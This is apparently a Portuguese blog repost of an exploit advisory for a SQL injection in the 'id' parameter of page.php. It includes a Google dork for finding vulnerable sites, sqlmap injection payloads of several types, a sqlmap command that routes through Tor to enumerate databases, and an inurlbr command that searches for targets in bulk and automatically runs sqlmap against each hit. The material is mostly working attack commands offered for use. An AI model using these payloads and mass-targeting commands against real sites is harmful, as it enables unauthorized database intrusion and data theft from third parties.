Vamos usar sqlmap para injeção de SQL e Scanner inurlbr para buscar alvos em massa.
[+] Discoverer Author: Killer~X [+] EMAIL: [email protected] [+] FACEBOOK: http://www.fb.com/xXalreshyXx [+] ASK: http://www.ask.fm/ALRESHY
[+] Dork:
intext:"Aadi" & inurl:"page.php?id="
[+] POC:
http://www.target.com/page.php?id=1+XPL_SQLI
[+] Exploit:
DEBUG: sqlmap
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL--
http://www.test.com/admin
[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch
OUTPUT PRINT:
[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"
OUTPUT PRINT:
REF
http://www.exploit4arab.net/exploits/1486
Nenhum comentário:
Postar um comentário
............